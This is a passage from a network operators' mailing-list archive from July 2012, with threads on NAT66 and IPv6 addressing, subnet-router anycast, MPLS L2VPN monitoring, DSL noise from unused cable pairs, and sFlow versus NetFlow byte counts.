On that note, the world of Mobile internet providers seems to be full of assumptions about the use of the devices and connection. It can probably never be saved anymore. If there ever was a mobile network that did not respect the users'/clients' interests this would be it.

>> Example:
>> You have a Cable and a DSL, they both provide IPv6 and you want to provide failover. You then use ULA or one of the Global Addresses on the LAN network, and set up NAT66 mappings for the secondary WAN, or both if you are using ULA.
>
> I have that and I use BGP with an ARIN prefix using the Cable and DSL as layer 2 substrates for dual-stack tunnels.

So can any user just send them an email "Hey, I dual home, can I have a /48 please?". That's not even considering that I need to terminate the prefix on a BGP router somewhere that someone surely wants money for.

> Works pretty well and doesn't cost much more than the NAT66 based solution.

It's in your words "doesn't cost much more" which translates to "too much", we're all cheapskates :-)

> Once you go to tunnels, why not go all the way and put BGP across the tunnels?

Because by using 2 tunnels from 2 different providers you actually hope to increase redundancy, we are not talking 2 Hurricane Electric tunnels here. It's one /48 from HE.net and another /48 from Sixxs. I've had a bit too much the past few months where a number of the HE.net tunnelbrokers have been the target for a DDoS attack.
Nothing I can blame HE.net for, but it does illustrate my point that having 2 different "upstream" (tunnel) providers works best.

Regards,
Seth

From kauer at biplane.com.au Tue Jul 17 02:15:00 2012
From: kauer at biplane.com.au (Karl Auer)
Date: Tue, 17 Jul 2012 17:15:00 +1000
Subject: using "reserved" IPv6 space
In-Reply-To: <894EB7FC-A18C-41BA-A778-85564632FC8E@delong.com>
References: <2059648.BTFFAkdkz4@lsdsrv> <4742592599634568524@unknownmsgid> <1342500058.6281.154.camel@karl> <894EB7FC-A18C-41BA-A778-85564632FC8E@delong.com>
Message-ID: <1342509300.6281.198.camel@karl>

On Mon, 2012-07-16 at 23:36 -0700, Owen DeLong wrote:
> Reread the spec... [the subnet router anycast address] gets the packet
> to one or more of the routers and it may well lead to packet
> duplication. There may or may not be coordination between the
> routers. It isn't in the spec.

Which spec? Looking at RFC 4291, Section 2.6.1:

   Packets sent to the Subnet-Router anycast address will be delivered to one router on the subnet. All routers are required to support the Subnet-Router anycast addresses for the subnets to which they have interfaces. The Subnet-Router anycast address is intended to be used for applications where a node needs to communicate with any one of the set of routers.

But I do not have an encyclopaedic knowledge of all the RFCs, so perhaps this has been superseded, obsoleted or updated...

Reading it with a squint: The phrase "packets [...] will be delivered to one router on the subnet" does not specifically exclude the possibility that packets will be delivered to more than one router on the subnet. Still, I do think it would be a little unreasonable to interpret it thus.

Regards, K.
--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Karl Auer (kauer at biplane.com.au)
http://www.biplane.com.au/kauer
GPG fingerprint: AE1D 4868 6420 AD9A A698 5251 1699 7B78 4EEE 6017
Old fingerprint: DA41 51B1 1481 16E1 F7E2 B2E9 3007 14ED 5736 F687

From ler762 at gmail.com Tue Jul 17 02:25:00 2012
From: ler762 at gmail.com (Lee)
Date: Tue, 17 Jul 2012 03:25:00 -0400
Subject: NAT66 was Re: using "reserved" IPv6 space
In-Reply-To: <20120717024040.7A074228E3B4@drugs.dv.isc.org>
References: <20120717024040.7A074228E3B4@drugs.dv.isc.org>
Message-ID:

On 7/16/12, Mark Andrews wrote:
>
> In message > , Lee
> writes:
>> On 7/16/12, Owen DeLong wrote:
>> >
>> > Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is
>> > being
>> > able to eliminate NAT. NAT was a necessary evil for IPv4 address
>> > conservation. It has no good use in IPv6.
>>
>> NAT is good for getting the return traffic to the right firewall. How
>> else do you deal with multiple firewalls & asymmetric routing?
>
> Traffic goes where the routing protocols direct it. NAT doesn't
> help this and may actually hinder as the source address cannot be
> used internally to direct traffic to the correct egress point.

_source_ address + 'used internally'?? I like policy based routing about as much as the more opinionated members of this list like NAT :)

> Instead you need internal routers that have to try to track traffic
> flows rather than making simple decisions based on source and
> destination addresses.
>
> Applications that use multiple connections may not always end up
> with consistent external source addresses.

In the general case, sure.
At work, the only time your external source address changes is when something quits working and you're automatically failed over to the working firewall (ha pair).

>> Yes, it's possible to get traffic back to the right place without NAT.
>> But is it as easy as just NATing the outbound traffic at the
>> firewall?
>
> It can be and it can be easier to debug without NAT mangling
> addresses.

Yes, there are times when NAT isn't the appropriate solution. I'm not religious about it.. just saying there's times when NAT is the simplest/easiest solution.

Regards,
Lee

From ler762 at gmail.com Tue Jul 17 02:33:13 2012
From: ler762 at gmail.com (Lee)
Date: Tue, 17 Jul 2012 03:33:13 -0400
Subject: NAT66 was Re: using "reserved" IPv6 space
In-Reply-To:
References: <20120717024040.7A074228E3B4@drugs.dv.isc.org>
Message-ID:

On 7/16/12, Grant Ridder wrote:
> If you are running an HA pair, why would you care which box it went back
> through?

You wouldn't. But if you've got an HA pair at site A and another HA pair at site B..

Lee

>
> -Grant
>
> On Monday, July 16, 2012, Mark Andrews wrote:
>
>>
>> In message > squUmZofs3_-yriHY8o4Gt3W9+x6fVUQ at mail.gmail.com >, Lee
>> writes:
>> > On 7/16/12, Owen DeLong > wrote:
>> > >
>> > > Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is
>> being
>> > > able to eliminate NAT. NAT was a necessary evil for IPv4 address
>> > > conservation. It has no good use in IPv6.
>> >
>> > NAT is good for getting the return traffic to the right firewall. How
>> > else do you deal with multiple firewalls & asymmetric routing?
>>
>> Traffic goes where the routing protocols direct it. NAT doesn't
>> help this and may actually hinder as the source address cannot be
>> used internally to direct traffic to the correct egress point.
>>
>> Instead you need internal routers that have to try to track traffic
>> flows rather than making simple decisions based on source and
>> destination addresses.
>>
>> Applications that use multiple connections may not always end up
>> with consistent external source addresses.
>>
>> > Yes, it's possible to get traffic back to the right place without NAT.
>> > But is it as easy as just NATing the outbound traffic at the
>> > firewall?
>>
>> It can be and it can be easier to debug without NAT mangling
>> addresses.
>>
>> The only thing helpful NAT66 does is delay the externally visible
>> source address selection until the packet passes the NAT66 box.
>>
>> Mark
>> --
>> Mark Andrews, ISC
>> 1 Seymour St., Dundas Valley, NSW 2117, Australia
>> PHONE: +61 2 9871 4742 INTERNET:
>> marka at isc.org
>>
>>
>

From peterehiwe at gmail.com Tue Jul 17 05:14:01 2012
From: peterehiwe at gmail.com (Peter Ehiwe)
Date: Tue, 17 Jul 2012 11:14:01 +0100
Subject: MPLS L2VPN monitoring
Message-ID:

Hello,

For those who provide l2vpn services to customers over MPLS, what kind of tools do you use for monitoring the circuits and what kind of values do you proactively monitor?

I have tools in place to monitor these circuits but I want to know, based on group members' experiences, in order to improve my monitoring platform for these circuits.

Thanks a lot!

From me at anuragbhatia.com Tue Jul 17 05:18:43 2012
From: me at anuragbhatia.com (Anurag Bhatia)
Date: Tue, 17 Jul 2012 15:48:43 +0530
Subject: Managing free pairs to prevent DSL sync. loss
Message-ID:

Hello everyone.

I am having a very bad time due to my ISP's poor last mile (in India). DSL is losing sync consistently and this time the problem seems quite interesting, so I thought to ask how ISPs across the world are managing it.

The problem is high attenuation & low SNR because of a "lot of free pairs" in the cable. My connection is coming from something like 100 pair > 50 pair > 20 pair > 5 pair. Now the 100 pair has less than 30 active lines but based on testing it seems like at the 100 pair DP there's very low noise and everything is pretty good (usual BSNL pillars in India have 100 pair terminations).
The next 20 pair has just 4 active lines (and 16 free lines causing issues for those 4 working lines) and at the end my line comes from 20 > 5 with only one (which is my) line active on one of 5 pairs.

Now the argument of my ISP (BSNL) is that due to the excessive number of free pairs, they are causing huge noise and they likely need to reduce these DPs by putting a 1-2 line wire from my home till the 100 pair pillar termination (which is down in the other street and so needs effort in digging and putting in new wire).

But I just never heard about this problem anywhere else. Do DSL providers really suffer due to free pairs? Assuming other pairs are all crossed/shorted, can they still produce significant noise in other working lines?

Also, what exactly was "bonding" used by AT&T in the US? I thought it was actually making use of free pairs, bonding them together and having more bandwidth for the end user, isn't it?

If someone can pass me some detailed whitepaper or document explaining this noise, it will be very much helpful.

Thanks.

--
Anurag Bhatia
Web: anuragbhatia.com
Skype: anuragbhatia.com
Linkedin | Twitter | Google+

From matt.addison at lists.evilgeni.us Tue Jul 17 06:18:28 2012
From: matt.addison at lists.evilgeni.us (Matt Addison)
Date: Tue, 17 Jul 2012 07:18:28 -0400
Subject: using "reserved" IPv6 space
In-Reply-To: <1342509300.6281.198.camel@karl>
References: <2059648.BTFFAkdkz4@lsdsrv> <4742592599634568524@unknownmsgid> <1342500058.6281.154.camel@karl> <894EB7FC-A18C-41BA-A778-85564632FC8E@delong.com> <1342509300.6281.198.camel@karl>
Message-ID: <6476010549005627514@unknownmsgid>

On Jul 17, 2012, at 3:15, Karl Auer wrote:
> Reading it with a squint: The phrase "packets [...] will be delivered to
> one router on the subnet" does not specifically exclude the possibility
> that packets will be delivered to more than one router on the subnet.
> Still, I do think it would be a little unreasonable to interpret it
> thus.
After reading some more I see how using subnet-router anycast works. The anycast address is global in scope so the end host will only learn 1 potential next hop at a time (the routers randomize a delay when responding to ND for a subnet-router anycast), and perform NUD as needed to determine if their current router is up or down (RFC4861). So you can get failover with no FHRP by using subnet-router anycast. You just won't get sub-second failover. From sergey at lobanov.in Tue Jul 17 06:35:42 2012 From: sergey at lobanov.in (Sergey V. Lobanov) Date: Tue, 17 Jul 2012 15:35:42 +0400 Subject: MPLS L2VPN monitoring In-Reply-To: References: Message-ID: <50054E0E.1000606@lobanov.in> Hello, For example, cpwVcOperStatus for Cisco devices. Look at proprietary mibs On 07/17/2012 02:14 PM, Peter Ehiwe wrote: > Hello , > > For those who provide l2vpn services to customers over MPLS , what > kind of tools do you use for monitoring the circuits and what kind of > values do you proactively monitor > > I have tools in place to monitor these circuits but i want to know > based on group members experiences in order to improve my monitoring > platform for this circuits. > > Thanks a lot! > -- wbr, Sergey V. Lobanov E-mail: sergey at lobanov.in Timezone: MSK(GMT+4) From bhmccie at gmail.com Tue Jul 17 07:03:38 2012 From: bhmccie at gmail.com (-Hammer-) Date: Tue, 17 Jul 2012 07:03:38 -0500 Subject: NAT66 was Re: using "reserved" IPv6 space In-Reply-To: References: Message-ID: <5005549A.6030407@gmail.com> I have almost one hundred FWs. Some physical. Some virtual. Various vendors. Your point is spot on. -Hammer- "I was a normal American nerd" -Jack Herer On 7/16/2012 8:55 PM, Lee wrote: > On 7/16/12, Owen DeLong wrote: >> Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is being >> able to eliminate NAT. NAT was a necessary evil for IPv4 address >> conservation. It has no good use in IPv6. > NAT is good for getting the return traffic to the right firewall. 
How > else do you deal with multiple firewalls & asymmetric routing? > > Yes, it's possible to get traffic back to the right place without NAT. > But is it as easy as just NATing the outbound traffic at the > firewall? > > Lee > > From bhmccie at gmail.com Tue Jul 17 07:27:45 2012 From: bhmccie at gmail.com (-Hammer-) Date: Tue, 17 Jul 2012 07:27:45 -0500 Subject: using "reserved" IPv6 space In-Reply-To: References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> Message-ID: <50055A41.2020005@gmail.com> -Hammer- "I was a normal American nerd" -Jack Herer On 7/16/2012 11:18 PM, Jimmy Hess wrote: > On 7/16/12, -Hammer- wrote: >> hurdles. Example? HSRP IPv6 global addressing on Cisco ASR platform. If > HSRP is a legacy proprietary protocol; try VRRP. Stateless > autoconfig and router advertisements can obviate (eliminate/reduce) > the need in many cases; albeit, with a longer failure recovery > duration. This isn't PAGP vs LACP again is it? Can someone show me a sunset document for HSRP from Cisco? Yes, VRRP, I use it as well. But that's not the point. The point is that it's a feature from a vendor that lacks parity across the product suites. Like most of the folks out there, I run IOS, NX-OS, IOS-XE, etc and that's just from Cisco. Feature parity is a big gripe that doesn't have an easy solution. I feel for the vendors but at the same time I'm frustrated when I read a document on a function and realize afterwards I can only deploy it on "some" of my up to date products. That's the point. >> this morning from CheckPoint for NAT66. This should have been ready for >> prime time years ago. I guess the vendors weren't getting the push from > NAT66; you're talking about something that is not a mainline feature, > an experimental proposition; RFC6296 produced in 2011. Very few > IPv6 deployments should require prefix translation or any kind of NAT > technology with IPv6, other than the IPv4 transition technologies. > > So... NO.. 
they should not have had this ready "for prime time" years ago. I disagree. I was asking security vendors what they were doing about these kinds of future needs years ago. Many years ago. They all conceded that they had had similar requests from other customers but the demand wasn't there yet. They should have had more vision on their road maps but they focused on basic functionality of the protocol and not features beyond that and now they are playing catch up. I understand, they were focused on what features were getting the attention. That's business. But everyone knew the depletion rates and everyone knew that whether the pompous USA wanted it or not IPv6 was coming in the late 2000s and early 2010s. So they should have been more diligent. You can pull up any marketing document from any vendor and they will tell you IPv6 is fully supported. But when you implement features (who the heck runs a default config these days?) you really test the functionality of the product. > There are other things they should have been working on, such as > getting the base IPv6 implementation correct, V6 connectivity, > V6-enabled protocols, support for the newer RA/DHCPv6 options, and > support for the newer more fully baked IPv4 transition specs such as > 6to4, NAT-PT, and bugfixing. > > I'll take the stable platform, that has the standards-specified > features, over one with bells and whistles, and the latest > experimental draft features such as 6to6, that are not required to > deploy IPv6, thanks. I agree. Stability. But a stable platform that doesn't have the features I need is not a stable platform I can invest in. Cart before horse. 
> -- > -JH > From saku at ytti.fi Tue Jul 17 07:47:13 2012 From: saku at ytti.fi (Saku Ytti) Date: Tue, 17 Jul 2012 15:47:13 +0300 Subject: using "reserved" IPv6 space In-Reply-To: <50055A41.2020005@gmail.com> References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <50055A41.2020005@gmail.com> Message-ID: <20120717124713.GA10157@pob.ytti.fi> I wonder who really believes there is no usage case for NAT66. Have these people seen non-trivial corporate networks? I'm sure many people in this list finance part of their lives with renumber projects costing MUSDs. For many companies just finding out where addresses have been punched in (your FWs, your software, partner FWs, partner software, configurations...) will take months, before even starting renumbering. If my enterprise customers don't have plan and ask my advice, I will recommend own PI, if they don't want (extra cost, extra clue needed) ULA and NAT66. If I recommend more specific from our PA, I know when they switch operators in few years time, some of them will decide renumbering is out-of-the-question[0] and will NAT my PA to new operator PA, essentially forcing me to never return any addresses to my free pool. I wonder if that is valid reason to ask more allocations? That address was once used? More specific from our PA is fine for small offices with trivial setup, residential networks and few niche shops who specifically design for renumbering (but I guess these most often already want PI+BGP) [0] I don't want NAT66 anywhere. I won't use NAT66 anywhere. But just because we have new protocol, does not mean we have new set of people, who share my ideologies and goals about network design. Only thing I can do, is protect myself from problems they would cause me. 
-- ++ytti From bhmccie at gmail.com Tue Jul 17 07:53:04 2012 From: bhmccie at gmail.com (-Hammer-) Date: Tue, 17 Jul 2012 07:53:04 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <20120717124713.GA10157@pob.ytti.fi> References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <50055A41.2020005@gmail.com> <20120717124713.GA10157@pob.ytti.fi> Message-ID: <50056030.4060002@gmail.com> There are routing and switching people and there are security people. And they look at things differently. That, IMHO, is the root of the emotion on this thread. No one is actually wrong except me for stirring the pot as the OP. :) -Hammer- "I was a normal American nerd" -Jack Herer On 7/17/2012 7:47 AM, Saku Ytti wrote: > I wonder who really believes there is no usage case for NAT66. Have these > people seen non-trivial corporate networks? > > I'm sure many people in this list finance part of their lives with renumber > projects costing MUSDs. For many companies just finding out where addresses > have been punched in (your FWs, your software, partner FWs, partner > software, configurations...) will take months, before even starting > renumbering. > > If my enterprise customers don't have plan and ask my advice, I will > recommend own PI, if they don't want (extra cost, extra clue needed) ULA > and NAT66. If I recommend more specific from our PA, I know when they > switch operators in few years time, some of them will decide renumbering is > out-of-the-question[0] and will NAT my PA to new operator PA, essentially > forcing me to never return any addresses to my free pool. I wonder if that > is valid reason to ask more allocations? That address was once used? > > More specific from our PA is fine for small offices with trivial setup, > residential networks and few niche shops who specifically design for > renumbering (but I guess these most often already want PI+BGP) > > [0] I don't want NAT66 anywhere. I won't use NAT66 anywhere. 
But just > because we have new protocol, does not mean we have new set of people, who > share my ideologies and goals about network design. Only thing I can do, is > protect myself from problems they would cause me. > From rps at maine.edu Tue Jul 17 08:06:15 2012 From: rps at maine.edu (Ray Soucy) Date: Tue, 17 Jul 2012 09:06:15 -0400 Subject: using "reserved" IPv6 space In-Reply-To: <50055A41.2020005@gmail.com> References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <50055A41.2020005@gmail.com> Message-ID: With all due respect to Owen, I don't share the view that everyone should be jumping into BGP or getting an allocation from ARIN, but that's been a long-standing debate between us. NPT allows you to get prefixes from multiple ISPs without having to get an allocation to coordinate routing; or in the other example, without having to have host systems maintain multiple global prefixes (which quickly becomes a security nightmare for auditing; a troubleshooting nightmare for support, etc). As far as it being costly, I think too much of the mindset on list is the large network or ISP perspective; for the small network that NPT is targeting, all this would happen in some "Dual WAN" multi-function firewall appliance. Modern hardware is often powerful enough to vastly exceed transport capacity for these networks, so the performance "cost" is a non-issue. All these other methods place far too much control on the host system (and its implementation) to be ready for prime time yet; the reality is that without NPT being widely available, we won't see 99% of small businesses using IPv6 for a long time, so if our goal is IPv6 adoption maybe it's time we stop the holy war on anything "NAT". Hammer has echoed legitimate concerns and confusion that represents a very large portion of the user base out there. Maybe we should be asking why that is instead of telling him he doesn't understand anything and that NAT is "evil". 
-- Ray Soucy Epic Communications Specialist Phone: +1 (207) 561-3526 Networkmaine, a Unit of the University of Maine System http://www.networkmaine.net/ From Dave.Siegel at level3.com Tue Jul 17 08:56:12 2012 From: Dave.Siegel at level3.com (Siegel, David) Date: Tue, 17 Jul 2012 13:56:12 +0000 Subject: MPLS L2VPN monitoring In-Reply-To: References: Message-ID: <72A2F9AF18EC024C962A748EA6CF75B90EC2CDE0@W8USSFJ204.ams.gblxint.com> We deploy NIDs to the customer premise. You just can't get enough alarm data by looking only at your router/switch on your side of an Ethernet NNI to give you a proper indication of whether the service is functional, and it also happens to be quite handy to have when a performance test/verification is required. There are a variety of vendors out there to choose from...we have quite a lot of Tellabs and Accedian out in the field. I had hoped that last mile vendors would have been providing NIDs "smartjack" style by now in a fairly ubiquitous fashion, but alas none of them have stepped up to the plate so we're still putting them out there on our own dime. Dave -----Original Message----- From: Peter Ehiwe [mailto:peterehiwe at gmail.com] Sent: Tuesday, July 17, 2012 4:14 AM To: North American Network Operators' Group Subject: MPLS L2VPN monitoring Hello, For those who provide l2vpn services to customers over MPLS, what kind of tools do you use for monitoring the circuits and what kind of values do you proactively monitor? I have tools in place to monitor these circuits but I want to know based on group members' experiences in order to improve my monitoring platform for these circuits. Thanks a lot! From johns at sstar.com Tue Jul 17 09:15:59 2012 From: johns at sstar.com (John Souvestre) Date: Tue, 17 Jul 2012 09:15:59 -0500 Subject: Managing free pairs to prevent DSL sync. loss In-Reply-To: References: Message-ID: <011601cd6426$b35fb060$1a1f1120$@sstar.com> Hello Anurag. 
I have not heard of this problem before, but I imagine that the non-terminated pairs could be acting like antennas and picking up noise. Have you considered grounding one end (or both) of the free pairs? Perhaps this would reduce the amount of noise they pick up. Regards, John John Souvestre - New Orleans LA - (504) 454-0899 -----Original Message----- From: Anurag Bhatia [mailto:me at anuragbhatia.com] Sent: Tuesday, July 17, 2012 5:19 am To: NANOG Mailing List Subject: Managing free pairs to prevent DSL sync. loss Hello everyone. I am having a very bad time due to my ISP's poor last mile (in India). DSL is losing sync. consistently and this time the problem seems quite interesting so I thought to ask how ISPs across the world are managing it. Problem is high attenuation & low SNR because of "lot of free pairs" in the cable. My connection is coming from something like 100 pair > 50 pair > 20 pair > 5 pair. Now 100 pair has less than 30 active lines but based on testing it seems like at 100 pair DP there's very low noise and everything is pretty good (usual BSNL pillars in India have 100 pair terminations). Next 20 pair has just 4 active lines (and 16 free lines causing issues for those 4 working lines) and at the end my line comes from 20 > 5 with only one (which is my) line active on one of 5 pairs. Now argument of my ISP (BSNL) is that due to excessive number of free pairs, they are causing huge noise and they likely need to reduce these DP's by putting 1-2 line wire from my home till 100 pair pillar termination (which is down in other street and so needs effort in digging and putting new wire). But I just never heard about this problem anywhere else. Do DSL providers really suffer due to free pairs? Assuming other pairs are all crossed/shorted, can they still produce significant noise in other working lines? Also, what exactly was "bonding" used by AT&T in US? 
I thought it was actually making use of free pairs, bonding them together and having more bandwidth for end user, isn't it? If someone can pass me some detailed whitepaper or document explaining about this noise, it will be very much helpful. Thanks. -- Anurag Bhatia Web: anuragbhatia.com Skype: anuragbhatia.com Linkedin | Twitter| Google+ From valdis.kletnieks at vt.edu Tue Jul 17 09:59:49 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Tue, 17 Jul 2012 10:59:49 -0400 Subject: Managing free pairs to prevent DSL sync. loss In-Reply-To: Your message of "Tue, 17 Jul 2012 09:15:59 -0500." <011601cd6426$b35fb060$1a1f1120$@sstar.com> References: <011601cd6426$b35fb060$1a1f1120$@sstar.com> Message-ID: <24359.1342537189@turing-police.cc.vt.edu> On Tue, 17 Jul 2012 09:15:59 -0500, "John Souvestre" said: > Have you considered grounding one end (or both) of the free pairs? Perhaps > this would reduce the amount of noise they pick up. Grounding both ends will probably result in "hilarity ensues". And I suspect that Anurag can't ground the free pairs, because the copper belongs to the provider. From MatlockK at exempla.org Tue Jul 17 10:13:33 2012 From: MatlockK at exempla.org (Matlock, Kenneth L) Date: Tue, 17 Jul 2012 09:13:33 -0600 Subject: Managing free pairs to prevent DSL sync. loss In-Reply-To: <24359.1342537189@turing-police.cc.vt.edu> References: <011601cd6426$b35fb060$1a1f1120$@sstar.com> <24359.1342537189@turing-police.cc.vt.edu> Message-ID: <4288131ED5E3024C9CD4782CECCAD2C716AD0D9C@LMC-MAIL2.exempla.org> Yeah, grounding both ends will result in some current traversing across the pairs all the time because of differences in ground potential over long-ish distances. 
Ken Matlock Network Analyst 303-467-4671 matlockk at exempla.org -----Original Message----- From: valdis.kletnieks at vt.edu [mailto:valdis.kletnieks at vt.edu] Sent: Tuesday, July 17, 2012 9:00 AM To: John Souvestre Cc: 'NANOG Mailing List' Subject: Re: Managing free pairs to prevent DSL sync. loss On Tue, 17 Jul 2012 09:15:59 -0500, "John Souvestre" said: > Have you considered grounding one end (or both) of the free pairs? > Perhaps this would reduce the amount of noise they pick up. Grounding both ends will probably result in "hilarity ensues". And I suspect that Anurag can't ground the free pairs, because the copper belongs to the provider. *** SCLHS Confidentiality Notice *** The information contained in this message may be privileged and confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any other dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error, please notify me immediately by replying to the message and deleting it from your computer. Thank you. *** SCLHS Confidentiality Notice *** From johns at sstar.com Tue Jul 17 10:16:17 2012 From: johns at sstar.com (John Souvestre) Date: Tue, 17 Jul 2012 10:16:17 -0500 Subject: Managing free pairs to prevent DSL sync. loss In-Reply-To: <4288131ED5E3024C9CD4782CECCAD2C716AD0D9C@LMC-MAIL2.exempla.org> References: <011601cd6426$b35fb060$1a1f1120$@sstar.com> <24359.1342537189@turing-police.cc.vt.edu> <4288131ED5E3024C9CD4782CECCAD2C716AD0D9C@LMC-MAIL2.exempla.org> Message-ID: <015701cd642f$1f9bd800$5ed38800$@sstar.com> Yes, but would this result in more or less noise than an open end acting like an antenna? And would the ground loop noise be in the DSL spectrum? John 
John Souvestre - New Orleans LA - (504) 454-0899 -----Original Message----- From: Matlock, Kenneth L [mailto:MatlockK at exempla.org] Sent: Tuesday, July 17, 2012 10:14 am To: valdis.kletnieks at vt.edu; John Souvestre Cc: NANOG Mailing List Subject: RE: Managing free pairs to prevent DSL sync. loss Yeah, grounding both ends will result in some current traversing across the pairs all the time because of differences in ground potential over long-ish distances. Ken Matlock Network Analyst 303-467-4671 matlockk at exempla.org -----Original Message----- From: valdis.kletnieks at vt.edu [mailto:valdis.kletnieks at vt.edu] Sent: Tuesday, July 17, 2012 9:00 AM To: John Souvestre Cc: 'NANOG Mailing List' Subject: Re: Managing free pairs to prevent DSL sync. loss On Tue, 17 Jul 2012 09:15:59 -0500, "John Souvestre" said: > Have you considered grounding one end (or both) of the free pairs? > Perhaps this would reduce the amount of noise they pick up. Grounding both ends will probably result in "hilarity ensues". And I suspect that Anurag can't ground the free pairs, because the copper belongs to the provider. From simon.leinen at switch.ch Tue Jul 17 10:32:45 2012 From: simon.leinen at switch.ch (Simon Leinen) Date: Tue, 17 Jul 2012 17:32:45 +0200 Subject: Real world sflow vs netflow? 
In-Reply-To: (James Braunegg's message of "Mon, 16 Jul 2012 22:01:14 +0000") References: <50012E21.4060802@bromirski.net> <50032DA2.9020108@foobar.org> Message-ID: James Braunegg writes: > In the end I did real life testing comparing each platform Great, thanks for sharing your results! (It would be nice if you could tell us a little bit about the configuration, i.e. what kind of sampling you used.) [...] > That being said both netflow and sflow both under read by about 3% > when compared to snmp port counters, which we put to the conclusion > was broadcast traffic etc which the routers didn't see / flow. That's one reason, but another reason would be that at least in Netflow (but sFlow may be similar depending on how you use it), the reported byte counts only include the sizes of the "L3" packets, i.e. starting at the IP header, while the SNMP interface counters (ifInOctets etc.) include L2 overhead such as Ethernet frame headers and such. -- Simon. From valdis.kletnieks at vt.edu Tue Jul 17 10:38:20 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Tue, 17 Jul 2012 11:38:20 -0400 Subject: Managing free pairs to prevent DSL sync. loss In-Reply-To: Your message of "Tue, 17 Jul 2012 10:16:17 -0500." <015701cd642f$1f9bd800$5ed38800$@sstar.com> References: <011601cd6426$b35fb060$1a1f1120$@sstar.com> <24359.1342537189@turing-police.cc.vt.edu> <4288131ED5E3024C9CD4782CECCAD2C716AD0D9C@LMC-MAIL2.exempla.org> <015701cd642f$1f9bd800$5ed38800$@sstar.com> Message-ID: <79774.1342539500@turing-police.cc.vt.edu> On Tue, 17 Jul 2012 10:16:17 -0500, "John Souvestre" said: > Yes, but would this result in more or less noise than an open end acting > like an antenna? And would the ground loop noise be in the DSL spectrum? No, it will be strictly a DC current, with the amperage easily calculated from the voltage difference between the two ends and the resistance of however many cable-feet of wire is involved. 
Not usually a big deal, unless your termination design didn't include the ability to sink a DC current 24/7. (Of course, actually measuring the voltage and resistance may be non-trivial :) From nick at foobar.org Tue Jul 17 11:37:44 2012 From: nick at foobar.org (Nick Hilliard) Date: Tue, 17 Jul 2012 17:37:44 +0100 Subject: Real world sflow vs netflow? In-Reply-To: References: <50012E21.4060802@bromirski.net> <50032DA2.9020108@foobar.org> Message-ID: <500594D8.9000400@foobar.org> On 17/07/2012 16:32, Simon Leinen wrote: > That's one reason, but another reason would be that at least in Netflow > (but sFlow may be similar depending on how you use it), the reported > byte counts only include the sizes of the "L3" packets, i.e. starting at > the IP header, while the SNMP interface counters (ifInOctets etc.) > include L2 overhead such as Ethernet frame headers and such. sflow includes both figures. Nick From olipro at 8.c.9.b.0.7.4.0.1.0.0.2.ip6.arpa Tue Jul 17 11:49:16 2012 From: olipro at 8.c.9.b.0.7.4.0.1.0.0.2.ip6.arpa (Oliver) Date: Tue, 17 Jul 2012 18:49:16 +0200 Subject: using "reserved" IPv6 space In-Reply-To: References: <2059648.BTFFAkdkz4@lsdsrv> Message-ID: <1405884.4ZNo3jpiVl@lsdsrv> On Monday 16 July 2012 21:11:18 you wrote: > The disadvantage to this is the high probability of packet duplication. For > someone worried about ICMP spam on the subnet, I'm surprised you're not > worried about what happens when 2 or more routers copy the same packet > and route both copies on to the end destination. (Lather, rinse, repeat said > duplication for any upstream segments using such tactics as well). > No. 
The all-routers anycast address is resolved and creates a single Layer 2 neighbor entry - it may change, but there's no packet duplication issue here because routing of an individual packet will only ever go to a single host at L2. There is a difference between Multicast and Anycast. Regards, Oliver From peter.phaal at gmail.com Tue Jul 17 12:16:11 2012 From: peter.phaal at gmail.com (Peter Phaal) Date: Tue, 17 Jul 2012 10:16:11 -0700 Subject: Real world sflow vs netflow? In-Reply-To: References: <50012E21.4060802@bromirski.net> <50032DA2.9020108@foobar.org> Message-ID: In the case of sFlow, the collector determines how to report bytes. The sFlow agent reports the size of the sampled layer 2 frame (along with the first 128 bytes of the frame) and the collector can choose whether to report L2 bytes, L3 bytes, L4 bytes etc. by subtracting the sizes of the headers. It seems likely that the sFlow collector used in the tests was reporting L3 bytes since the numbers were in agreement with the numbers reported by NetFlow. Peter On Tue, Jul 17, 2012 at 8:32 AM, Simon Leinen wrote: > James Braunegg writes: >> That being said both netflow and sflow both under read by about 3% >> when compared to snmp port counters, which we put to the conclusion >> was broadcast traffic etc which the routers didn't see / flow. > > That's one reason, but another reason would be that at least in Netflow > (but sFlow may be similar depending on how you use it), the reported > byte counts only include the sizes of the "L3" packets, i.e. starting at > the IP header, while the SNMP interface counters (ifInOctets etc.) > include L2 overhead such as Ethernet frame headers and such. > -- > Simon. > From MatlockK at exempla.org Tue Jul 17 12:16:07 2012 From: MatlockK at exempla.org (Matlock, Kenneth L) Date: Tue, 17 Jul 2012 11:16:07 -0600 Subject: Managing free pairs to prevent DSL sync. 
